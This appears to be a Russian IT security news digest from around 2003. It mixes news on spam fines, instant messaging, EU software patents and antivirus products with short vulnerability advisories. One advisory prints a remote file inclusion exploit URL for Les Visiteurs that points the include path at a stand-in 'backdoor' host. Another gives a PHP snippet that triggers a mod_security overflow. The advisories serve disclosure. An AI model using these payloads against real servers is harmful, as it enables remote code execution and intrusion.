Калифорнийский суд приговорил фирму PW Marketing к уплате штрафа в сумме 2 млн. долл. за нарушение действующего в штате закона, который запрещает несанкционированную рассылку коммерческой электронной почты. PW Marketing в лице ее владельцев Пола Уиллиса и Клаудии Гриффин была привлечена к суду в сентябре за отправку нескольких миллионов сообщений с рекламой инструкций по организации массовых рассылок, а также соответствующих программ и списков адресов электронной почты. В дополнение к штрафу владельцам компании запрещены дальнейшие рассылки, сокрытие личности отправителей посредством подделки технической информации в сообщениях, осуществление доступа к чужим компьютерам и использование их без разрешения. Кроме того, нарушителям запрещено владеть или управлять любой компанией, занимающейся Internet-рекламой, без письменного уведомления генерального прокурора штата. Напомним, что с 1 января будущего года в Калифорнии вступает в силу новый, более жесткий антиспамерский закон.

Служба новостей IDG, Лондон

Программа: Les Visiteurs 2.x

Опасность:

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Les Visiteurs. Злонамеренный пользователь может получить доступ к системе.

Сценарии "include/new-visitor.inc.php" и "include/config.inc.php" не проверяют фактическое расположение сценариев lang/.inc.php и db/db_mysql.inc.php, представленных а параметре lvc_include_dir.

Пример/Эксплоит:

http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/

URL производителя: http://chezwam.net/main/publications/lesvisiteurs/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Программа: Libnids 1.17

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Libnids. Злонамеренный пользователь может скомпрометировать уязвимую систему.

Уязвимость проверки границ обнаружена в разборе TCP пакетов. В результате удаленный пользователь может послать чрезмерно длинный, специально сформированный TCP пакет к приложению, которое использует Libnids, чтобы выполнить произвольный код на целевой системе с привилегиями уязвимого приложения.

URL производителя:http://libnids.sourceforge.net/

Решение:Установите обновленную (1.18) версию программы: http://prdownloads.sourceforge.net/libnids/libnids-1.18.tar.gz?download

Программа: The Bat! Опасность: Низкая Наличие эксплоита: Не нужен Описание: Уязвимость обнаружена в почтовом клиенте The Bat!. Локальный пользователь может получить доступ к почтовым сообщениям целевого пользователя. The Bat! cоздает новую учетную запись с небезопасными разрешениями в %programfiledir%\The Bat!\MAIL\ каталоге. Локальный пользователь может просматривать сообщения в inbox и outbox папках. URL производителя:http://www.ritlabs.com/en/products/thebat/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Some serious security holes in 'The Bat!'

AOL, специалисты которого не смогли смириться с небезопасностью программы Windows Messenger, нашли простой выход - заблокировать его использование для своих подписчиков. Одной из причин такого неуважительного отношения к продукту Microsoft является и то, что им до сих пор активно пользуются нерадивые интернет-рекламисты для рассылки рекламных сообщений, которые выскакивают прямо на десктопе.

"У наших пользователь есть прекрасный интернет-пейджер - AOL Instant Messenger. Пусть пользуются им," заявило руководство AOL. Заодно замурованной, причем замурованной централизованно, оказалась и дыра, которая позволяла спаммерам вытворять такие трюки, а хакерам - удаленно получать контроль над компьютером пользователя.

Возражений со стороны руководства Microsoft не поступало - AOL сделало все корректно, оставив своему подписчику возможность воспользоваться Windows Messenger, однако для этого ему нужно совершить дополнительные действия. Тем не менее, данный прецедент взбудоражил общественность и поднял вопрос о том, как далеко может заходить сервис-провайдер в попытке обезопасить своих клиентов от некоторых нежелательных моментов пользования Интернетом.

В середине октября Microsoft назвал имена десяти новых партнерских производителей, которые будут поддерживать корпоративную платформу службы мгновенного обмена сообщениями. Система, известная как Office Live Communications Server 2003 – технологическое решение IM от Microsoft, поддерживает передачу голосового сигнала, видео и данных, дебютировала 21 октября.

Среди производителей, поддерживающих платформу, фигурируют Imlogic (г. Волтам, штат Массачусетс), разработчик корпоративного инфраструктурного ПО, и FaceTime (г. Фостер Сити, штат Калифорния), поставщик услуг IM безопасности, менеджмента и решений в области управления.

В сочетании со службой MSN Messenger Connect for Enterprises (Корпоративное подключение) IM Manager создает условия для интеграции в сети обмена сообщениями от Microsoft, расширяя возможности управления, безопасность и совместимость посылаемых сообщений при использовании брандмауэра.

По словам IMLogic, комбинированное решение IM на основе IM Manager и MSN Messenger Connect for Enterprises первое в своем роде корпоративное решение, предоставляющее средства установления личности для корпоративных пользователей, находящихся за стенами организации, «в любое время, в любом месте» позволяя им зайти во внутреннюю сеть корпорации. Управление идентификацией гарантирует сохранность идентификаторов служащих по всему предприятию и во всей сети Messenger. Кроме этого идентификаторы базируются на корпоративных стандартах каталогизации и наименования.

Тяжеловесы IM - AOL, Microsoft, Yahoo! и Sun Microsystems – настроились на обсуждение технических аспектов разработок для делового сообщества. Компании активно взялись за дело, о чем говорят разбирательства по поводу патентов и совместимости между платформами. Ставки очень высоки. Согласно данным J.D. Power and Associates, такие технологии как мгновенные сообщения все больше внедряются в сферу междугородней связи и уже начинают доминировать над традиционными средствами общения.

Широко известно, что внедрение IM сопряжено с многочисленными брешами в системе безопасности, что станет проблемой, если данная платформа начнет широко использоваться публично.

Источник: www.internetnews.com, ibusiness.ru

Программа: Microsoft Internet Explorer 6.0 и возможно более ранние версии Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Microsoft Internet Explorer (IE). Удаленный пользователь может выполнить произвольные файлы в local computer zone. Удаленный пользователь может сконструировать HTML, который содержит ссылку на удаленный CGI сценарий, используя специально сформированный заголовок Location. Удаленный CGI сценарий может получить доступ или выполнить произвольные локальные файлы с привилегиями Local Computer zone, используя ActiveX объект. Используя эту уязвимость, атакующий может, например, установить специально обработанные куки и затем заставить IE выполнить код, содержащийся в этих куки. Дополнительные детали будут сообщены после выхода патча. Пример/Эксплоит: http://www.mlsecurity.com/ie/ie.htm URL производителя: http://www.microsoft.com/technet/security/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Internet Explorer and Opera local zone restriction bypass

Программа: mod_security 1.7RC1 - 1.7.1 (Apache 2 version) Опасность: Кртическая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в mod_security. Удаленный пользователь может выполнить произвольный код на уязвимой системе. Уязвимость обнаружена в функции sec_filter_out() в apache2/mod_security.c. Атакующий может сконструировать PHP сценарий, который генерирует чрезмерно большие выходные данные, например, когда записывает большой файл в output: <?php Header('Content-Type: image/jpeg'); readfile('some_large_image.jpeg'); ?> Переполнение не произойдет, когда запрашивается чрезмерно большой файл на прямую из сервера (GET методом). Уязвимость может эксплуатироваться атакующим, способным загружать собственные сценарии на сервер или через некоторые XSS уязвимости на сайте. URL производителя:http://www.modsecurity.org Решение:Установите обновленную версию программы (1.7.2) или отключите опцию "SecFilterScanOutput Off".

mod_security 1.7RC1 to 1.7.1 vulnerability

МВД России намерено активизировать борьбу с преступлениями, совершенными с использованием интернета. Об этом в РИА «Новости» сообщил заместитель министра внутренних дел — начальник Федеральной службы по борьбе с экономическими и налоговыми преступлениями (ФСЭНП) МВД РФ Сергей Веревкин-Рахальский.

«На сегодняшний день озабоченность органов внутренних дел вызывает использование мошенниками интернета для выстраивания финансовых пирамид», — сказал Веревкин-Рахальский.

По его словам, речь идет о том, что подставные компании через интернет набирают штат участников — держателей пластиковых кредитных карт, на которые необходимо внести первоначальный взнос. Затем на эти карты виртуально начисляются «значительные денежные средства», которые используются для совершения покупок не существующего товара в интернет-магазине. После этого мошенники производят отмену всех операций возврата, а денежные средства с платежных карт снимаются и компания-организатор исчезает.

Замминистра сообщил, что по фактам мошенничества, совершенного финансовыми пирамидами, ФСЭНП направила в суды 12 уголовных дел. Еще по восьми делам проводятся следственные действия.
8

Сокращение новых корпоративных контрактов на программное обеспечение из-за поражения Windows компьютерным червем грозит котировкам акций и доходам софтверного гиганта.

Рассматривая вопросы защиты информации и безопасности предприятий как обязательное условие ведения современного бизнеса, Академия Информационных Систем проводит в Санкт-Петербурге с 11 по 12 ноября в рамках XII Международного форума «Охрана и безопасность» научно-практическую конференцию «Актуальные проблемы безопасности информационного пространства». Конференция станет продолжением серии мероприятий Академии, посвященных данной тематике и имеющих уже свою постоянную аудиторию.

Поддержку конференции оказывают представители ведущих органов, регулирующих отношения в сфере информационной безопасности, среди которых Аппарат Совета Безопасности России, Аппарат полномочного представителя Президента РФ Северо-Западном федеральном округе, Гостехкомиссии России, Министерство внутренних дел РФ, Министерство РФ по делам гражданской обороны, чрезвычайным ситуациям и ликвидации последствий стихийных бедствий, Министерство промышленности, науки и технологий РФ.

Отметив особую роль обеспечения информационной безопасности в деятельности кредитно-финансовой сферы, мероприятие поддержал президент Ассоциации российских банков Тосунян Г.А. По его мнению, одной из центральных тем, которая непременно вызовет живой интерес специалистов, станет проблема разработки корпоративных стандартов и других документов, концентрирующих в себе все лучшее из многолетнего опыта работы в данной области.

Помимо этого, в работе конференции будут затронуты такие вопросы как

• Современные проблемы обеспечения информационной безопасности и пути их решения.
• Удостоверяющие центры в системах электронного документооборота.
• Совершенствование нормативно-правовой базы в области защиты информации.
• Новые стандарты в области информационной безопасности.
• Поддержка и развитие экспортного потенциала отечественных разработок в области информационной безопасности.
• Актуальные проблемы оптимизации инвестиций и снижения информационных рисков при выполнении работ по обеспечению информационной безопасности.
• Практическое применение эффективных решений в области информационной безопасности.

Информационными спонсорами мероприятия выступают CNews и издательский дом "Открытые Системы". Информационную поддержку конференции оказывают издание «Мир и безопасность» и интернет-порталы SEC.ru, OXPAHA.ru, Sec4all.ru.

Зарегистрироваться на конференцию можно здесь.

В конце сентября Европейский парламент на своем очередном заседании одобрил в первом чтении проект документа о патентной защите в сфере программных разработок.

Его принятие проходило в накаленной атмосфере ожесточенных споров и многочисленных поправок. Этому обсуждению предшествовали такие же жаркие дискуссии в рамках комиссии ЕС, внесшей итоговый вариант текста на рассмотрение депутатов.

Директивы "О патентовании изобретений в сфере компьютерных приложений" призваны прояснить вопросы авторского права в софтверном секторе и создать юридическую базу для решения будущих правовых споров.

По мнению создателей законопроекта, только на такой основе можно будет защитить разработки ученых и предпринимателей Старого Света от конкурентов из США и Японии.

В ходе парламентских дебатов, однако, выяснилось, что ни у сторонников, ни у противников софтверного патентования нет четкого представления об объекте защиты.

В итоге многие положения предложенного комиссией документа были отвергнуты как "заходящие чрезмерно далеко".

Объектами патентования парламентарии согласились признать только такие заявки, которые непосредственно связаны с техническими новациями; иначе говоря, чисто программные разработки или алгоритмы не могут быть зарегистрированы в качестве изобретений.

Патентованию могут подлежать, скажем, компьютеризированная домашняя техника или тормозное устройство. Страсбургские законодатели надеются, что таким образом им удастся поставить барьер на пути потока "тривиальных решений": с 1986 г.

Европейским патентным бюро в Мюнхене было выдано около 30 тыс. софтверных патентов, однако вряд ли многие из них заслуживают такого признания.

Интересно, что главными противниками одобренного документа выступают как раз те, кого авторы законопроекта, по их словам, собираются защищать в первую очередь, -- предприниматели средней руки и программисты.

С резкой критикой директив выступило, к примеру, Европейское объединение малого и среднего бизнеса: его членам вполне хватает нынешнего правового поля для обеспечения своих авторских прав.

Принятие же директив чревато непомерными накладными расходами -- от создания собственных юридических подразделений до выплат лицензионных отчислений. "Тот, кто патентует программные разработки, играет на руку "большим деньгам, а не большим мозгам", -- утверждают их лоббисты (в основном -- представители "зеленых" партий) в парламенте. -- В выигрыше окажутся только крупные компании, располагающие хорошими юридическими отделами.

Для них патент станет орудием не защиты, а нападения на конкурентов. В результате патентование будет лишь тормозить инновации".

В число недовольных входят и непосредственно разработчики программного обеспечения. В их рядах высказывается беспокойство, что вступление в силу новых нормативов затруднит улучшение иных софтверных решений, находящихся под патентной защитой.

К самым рьяным идейным противникам патентования ПО относятся, разумеется, участники проекта GNU, они же члены Фонда свободного ПО, или FSF (Free Software Foundation, ), для которых любое ограничение в этой сфере -- как красная тряпка для быка.

Против патентования программ и алгоритмов сочли нужным выступить признанные авторитеты компьютерного мира, создатели ОС Linux Линус Торвальдс и Алан Кокс.

В открытом письме в Европарламент они утверждают, ссылаясь на американский опыт, что патентование программ стимулирует не разработки, а траты на приобретение патентов и правовые споры.

С другой стороны, по мнению представителя Общества информатиков, непризнание чисто софтверных решений в качестве объектов патентования вынудит инновационные фирмы регистрировать свои изобретения в другом, неевропейском экономическом пространстве.

Так или иначе, в ноябре одобренным парламентом директивам предстоит еще одно рассмотрение -- уже в Совете Министров ЕС. Даже при беспроблемном прохождении всех инстанций они не вступят в силу раньше чем в конце этого года.

Компания «Электронные Офисные Системы» проводит 30-31 октября 2003 года в Москве (ул. Новый Арбат, 36 в здании мэрии Москвы) конференцию «Дело-2003», посвященную обмену опытом организаций, использующих программные продукты нашей компании.

Для участия в конференции приглашаются руководители документационных и информационных структур организаций, использующих систему «Дело». В их числе - Совет Федерации, Госдума, Центризбирком, Счетная Палата, Банк России, Минэкономразвития, Правительство Московской области, «Татнефть», «Мосэнерго», Международный аэропорт “Борисполь” и др. Общее число участников - 250. Наряду с нашими заказчиками, в работе конференции «Дело-2003» также примут участие представители органов государственной власти, занимающиеся вопросами документационного обеспечения управления и информационных технологий, Гильдии управляющих документацией, а также наши ведущие партнеры – компании Oracle, “Крипто-Про”, “Рускард”, Documentum, Aladdin и др.

Для участия в конференции необходимо зарегистрироваться непосредственно на нашем сайте www.eos.ru или послать письмо по электронной почте conf@eos.ru или сообщить по телефону/факсу ЭОСа (095) 299-26-08, 299-26-41, 299-27-05, 209-64-96.

Можно присылать вопросы, а также доклады и сообщения, с которыми вы хотели бы выступить. Получить дополнительную информацию о конференции, а также бланк заявки для участия Вы можете на странице http://www.eos.ru, а также непосредственно у ответственного секретаря оргкомитета Егорова Геннадия.

Источник: по материалам компании «Электронные Офисные Системы».

"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, сообщает о выпуске новой версии Антивируса Касперского для почтовых серверов Linux/Unix 5.0, которая пришла на смену предыдущей версии 4.0. Продукт включает в себя ряд существенных изменений и доработок, значительно повышающих функциональность и производительность защиты.

Антивирус Касперского для почтовых серверов Linux/Unix предназначен для проведения централизованной антивирусной проверки всех потоков электронной корреспонденции в масштабе реального времени. Система поддерживает FreeBSD, OpenBSD и наиболее популярные дистрибутивы Linux и позволяет осуществлять эффективный поиск и нейтрализацию вредоносных кодов во всех объектах, проходящих через сервер, обеспечивая доставку на клиентские компьютеры только гарантированно безопасных данных.

Основным отличием Антивируса Касперского для почтовых серверов Linux/Unix 5.0 является реализация новой антивирусной технологии, последней разработки экспертов "Лаборатории Касперского". Внедренное во все компоненты продукта антивирусное ядро включает в себя передовые антивирусные технологии мирового класса и обеспечивает значительное по сравнению с предшествующей версией снижение нагрузки на производительность компьютера при полном сохранении функциональности защиты.

Системным администраторам также придется по вкусу модернизированная система централизованного управления. В частности, теперь продукт поставляется вместе с модулем (plug-in) к популярной программе Webmin, что позволило расширить функциональность удаленного администрирования и улучшить совместимость.

Помимо этого, усовершенствована система сбора и представления статистических данных, исправлены функциональные недостатки предыдущей версии продукта, связанные с его архитектурными особенностями, а также модифицирована политика лицензирования. В новой версии продукта для почтовых серверов также существенно доработаны компоненты, отвечающие за проверку почтового трафика и уведомления о результатах работы программы.

Пользователи предыдущих версий Антивируса Касперского для почтовых серверов Linux/Unix могут перейти на новую версию продукта бесплатно.

НОУ «Академия Информационных Систем» (АИС), входящая в группу компаний «Стинс Коман», и компания Aladdin Software Security R.D., разработчик и поставщик систем аутентификации и защиты информации, объявили о заключении партнерского соглашения. По условиям договора Академия получила статус Серебряного бизнес-партнера компании (Silver Business Partner).

В последнее время решение вопросов защиты информации и безопасности организаций стало обязательным условием ведения современного бизнеса. В связи с этим начало совместной работы с компанией Aladdin, одним из лидеров российского рынка в области ИТ-безопасности – важный шаг в деле развития в Академии обозначенного направления: теперь АИС займется продвижением продуктов, технологий и услуг компании Aladdin, также предполагается их использование в собственных проектах Академии.

Развитие деятельности Академии в сфере защиты информации является одним из приоритетных: компания занимается обучением специалистов работе с системами защиты информации ряда производителей, проводит мероприятия с целью информационного выравнивания участников рынка в вопросах безопасности информационных систем, привлекая органы, регулирующие отношения в этой сфере. Опыт Академии в области обучения по вопросам информационной безопасности планируется использовать при совместной разработке учебных программ, направленных на подготовку специалистов к работе с продуктами Aladdin.

Представленный на рассмотрение Верховной Рады Украины законопроект «О мониторинге телекоммуникаций» вызвал бурное обсуждение и даже непринятие некоторыми организациями.

Крупнейшая провайдерская ассоциация «Интернет-ассоциация Украины» (ИнАУ), объединяющая 70 участников рынка, в том числе крупных интернет-провайдеров, обращалась к парламентариям и различным государственным органам, указывая на то, что мониторинг может привести к нарушению прав украинских пользователей Интернет.

Международная правозащитная организация «Репортеры без границ» обеспокоена попытками Службы безопасности Украины взять под свой контроль действия в сети Интернет, в том числе сообщения электронной почты. Об этом говорится в распространенном ею заявлении.

Генеральный секретарь этой организации Роберт Менар считает, что Интернет стал ключевой целью для СБУ. Он, в частности, отмечает попытки государственных органов забрать администрирование украинского домена .ua у частного предприятия «Хостмастер», а также инициативу СБУ по легализации мониторинга (законопроект «О мониторинге телекоммуникаций»).

Руководитель «Репортеров без границ» также заявил, что его организация внимательно будет следить за событиями в Украине, где, по его словам, власть тщательно проверяет деятельность средств массовой информации.

Копию заявления международная организация направила в американскую корпорацию ICANN, занимающуюся распределением доменных имен в сети Интернет.
15

Дирекция Форума "Технологии безопасности" и Телестудия ГУВД г. Москвы (телепрограмма "Петровка, 38") заключили соглашение о сотрудничестве, в рамках которого всем экспонентам предлагаются эксклюзивные условия для рекламы во время подготовки и проведения Форума

В рамках сотрудничества Телестудия ГУВД г. Москвы в статусе ТВ-партнера Форума "Технологии безопасности" обеспечивает комплексную поддержку Форума и его участников на канале ТВЦ в программе "Петровка, 38".

Основным пунктом сотрудничества является создание в рамках программы специальной рубрики "Международный форум "Технологии безопасности" представляет...", в которых будут размещаться информационные сюжеты о компаниях-участниках Форума.

Для всех экспонентов предусмотрены специальные условия для размещения информационных сюжетов в рубрике, в рамках программы "Петровка, 38".

По результатам выхода рубрики и съемок непосредственно на выставке, будет сформирована библиотека сюжетов, которая будет транслироваться все дня работы Форума на большом экране на входе на выставку.

После почти годичного перерыва, компания Trend Micro выпустила новую версию свого антивирусного пакета PC-cillin Internet Security.

Среди новых возможностей PC-cillin Internet Security 2004 следует упомянуть, прежде всего, систему защиты от спама, использующую набор подписей, "белых" и "черных" списков отправителей, а также эвристический анализатор для распознавания спама. Эта функция работает с протоколом POP3, а также с некоторыми популярными почтовыми серверами, например, AOL. Новый вирус-сканнер PC-cillin теперь обнаруживает не только вирусы, но и рекламные и шпионские программы, которые самоинсталируются на компьютере.

Разработчики постарались усилить и обычные антивирусные функции. Прогамма способна просматривать шестислойные архивы 24 различных алгоритмов сжатия. PC-cillin Internet Security 2004, кроме того, сканирует траффик, предотвращая проникновение на компьютер новых сетевых вирусов типа W32.Blaster, которые не записываются на жесткий диск.

Новая программа снабжена также функцией защиты личной информации, которая выдает предупреждение всякий раз, когда пользователь отправляет электронной почтой или иным способом номер кредитной карты, карточки социального страхования и т.п. Эту же функцию имеет вышедшее несколько ранее приложение Internet Security Suite компании Symantec.

PC-cillin Internet Security 2004 работает в Windows версий 98, Me, 2000 и XP. Программа также способна работать на КПК под управлением операционных систем PalmOS, Microsoft Windows Mobile, Epoch, хотя вирусов, поражающих эти системы пока не выявлено.

Стоимость версии PC-cillin для настольных компьютеров составляет 49,95 доллара США.